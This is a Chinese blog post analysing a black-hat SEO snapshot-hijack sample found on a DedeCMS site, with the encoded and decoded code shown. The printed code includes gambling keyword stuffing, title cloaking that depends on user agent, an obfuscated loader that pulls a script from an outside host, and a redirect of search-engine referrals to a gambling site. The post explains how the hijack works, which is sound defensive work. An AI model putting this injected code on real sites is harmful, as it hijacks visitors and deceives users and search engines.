富贵长生天做主由不得我
钢骨正气我做主由不得天

织梦的一段黑帽SEOJS快照劫持代码样本,解密看看

<title>&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#95;&#53;&#20998;&#36187;&#36710;&#35745;&#21010;&#95;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#32593;&#22336;&#45;&#53;&#20998;&#36187;&#36710;&#23448;&#32593;</title>
<meta name=”keywords” content=”&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#44;&#53;&#20998;&#36187;&#36710;&#35745;&#21010;&#44;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#32593;&#22336;&#44;&#53;&#20998;&#36187;&#36710;&#23448;&#32593;”/>
<meta name=”description” content=”&#53;&#20998;&#36187;&#36710;&#12304;&#24179;&#21488;&#32593;&#22336;&#58;&#120;&#120;&#53;&#54;&#55;&#46;&#99;&#111;&#109;&#44;&#20195;&#29702;&#113;&#113;&#32676;&#58;&#52;&#52;&#51;&#57;&#52;&#51;&#12305;&#53;&#20998;&#36187;&#36710;&#27880;&#20876;&#44;&#53;&#20998;&#36187;&#36710;&#24320;&#25143;&#44;&#53;&#20998;&#36187;&#36710;&#23448;&#26041;&#32593;&#31449;&#44;&#53;&#20998;&#36187;&#36710;&#24179;&#21488;&#44;&#53;&#20998;&#36187;&#36710;&#26159;&#27491;&#35268;&#30340;&#21527;&#44;&#53;&#20998;&#36187;&#36710;&#25552;&#20379;&#35268;&#24459;&#44;&#25216;&#24039;&#44;&#19979;&#36733;&#44;&#36208;&#21183;&#22270;&#44;&#24320;&#22870;&#32467;&#26524;&#31561;&#20869;&#23481;&#44;&#35802;&#20449;&#32593;&#25237;&#31469;&#35802;&#20026;&#24744;&#25552;&#20379;&#26368;&#22909;&#26368;&#26032;&#30340;&#28216;&#25103;&#20135;&#21697;&#33;”/>
<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”金属制品有限公司”}</script>
<script type=”text/javascript”> var xt = String.fromCharCode(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,115,58,47,47,115,102,104,117,102,104,50,46,99,111,109,47,100,100,113,112,46,106,115,34,62,60,47,115,99,114,105,112,116,62,32,); document.write(xt); </script>

tdk 都用的是 Unicode 编码,,随便解码就可以了,解码出一般都是一些菠菜词

—————————————————————————————————————————

<script>if(navigator.userAgent.toLocaleLowerCase().indexOf(“baidu”) == -1){document.title =”金属制品有限公司”}</script>

上面这段代码很简单,障眼法,让网站打开显示看上去是正常的,不容易发现


主要看JS 怎么判断的,eavl 那段JS 代码是ASCII加密 ,解密后,得到

window[“document”][“write”](‘<script type=”text/javascript” src=”https://sfhufh2.com/cxc.js”></script>’);

var _hmt = _hmt || [];
(function() {
  var hm = document.createElement("script");
  hm.src = "https://hm.baidu.com/hm.js?946f996ab7b073419462ec221f224e6a";
  var s = document.getElementsByTagName("script")[0]; 
  s.parentNode.insertBefore(hm, s);
})();
(function () {
    /*百度推送代码*/
     var bp = document.createElement('script');
     bp.src = '//push.zhanzhang.baidu.com/push.js';
     var s = document.getElementsByTagName("script")[0];
     s.parentNode.insertBefore(bp, s);
     /*360推送代码*/
     var src = document.location.protocol + '//js.passport.qihucdn.com/11.0.1.js?8113138f123429f4e46184e7146e43d9';
     document.write('<script src="' + src + '" id="sozz"><\/script>');
     })();

document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://141198.com\";");
document.writeln("</script>");
一段百度统计,一段推送代码,然后是判断来路劫持。这个菠菜站老油条了,抓到好多站都是这个菠菜站搞的鬼
-------------------------------------------------------------------------------------------------------------------------------------------------------------------
赞(1)
未经允许不得转载:网站快照劫持代码-快照删除-黑帽SEO » 织梦的一段黑帽SEOJS快照劫持代码样本,解密看看

评论 抢沙发

2 + 1 =
  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址